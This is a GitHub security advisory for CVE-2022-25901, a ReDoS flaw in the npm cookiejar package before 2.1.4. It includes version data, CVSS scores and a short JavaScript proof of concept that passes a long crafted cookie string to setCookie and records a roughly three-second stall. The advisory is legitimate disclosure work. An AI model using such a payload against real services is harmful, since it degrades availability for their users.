GHSA-h452-7996-h45h: cookiejar Regular Expression Denial of Service via Cookie.parse function

cookiejar Regular Expression Denial of Service via Cookie.parse function

Moderate severity GitHub Reviewed Published Jan 18, 2023 • Updated Jan 23, 2023

Package

npm cookiejar (npm)

Affected versions

< 2.1.4

Patched versions

2.1.4

maven org.webjars.npm:cookiejar (Maven)

<= 2.1.3

None

Description

Versions of the package cookiejar before 2.1.4 are vulnerable to Regular Expression Denial of Service (ReDoS) via the Cookie.parse function and other aspects of the API, which use an insecure regular expression for parsing cookie values. Applications could be stalled for extended periods of time if untrusted input is passed to cookie values or attempted to parse from request headers.

Proof of concept:

ts\nconst { CookieJar } = require("cookiejar");

const jar = new CookieJar();

const start = performance.now();

const attack = "a" + "t".repeat(50_000);
jar.setCookie(attack);

console.log(`CookieJar.setCookie(): ${performance.now() - start}ms`);



CookieJar.setCookie(): 2963.214399999939ms

References

• https://nvd.nist.gov/vuln/detail/CVE-2022-25901
• bmeck/node-cookiejar#39
• bmeck/node-cookiejar@eaa0002
• https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-3176681
• https://security.snyk.io/vuln/SNYK-JS-COOKIEJAR-3149984
• https://github.com/bmeck/node-cookiejar/blob/master/cookiejar.js#23L73

Severity

Moderate

5.3

/ 10

CVSS base metrics

Attack vector

Network

Attack complexity

Low

Privileges required

None

User interaction

None

Scope

Unchanged

Confidentiality

None

Integrity

None

Availability

Low

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Weaknesses

CWE-1333

CVE ID

CVE-2022-25901

GHSA ID

GHSA-h452-7996-h45h

Source code

bmeck/node-cookiejar

Credits

• sno2

Checking history

See something to contribute? Suggest improvements for this vulnerability.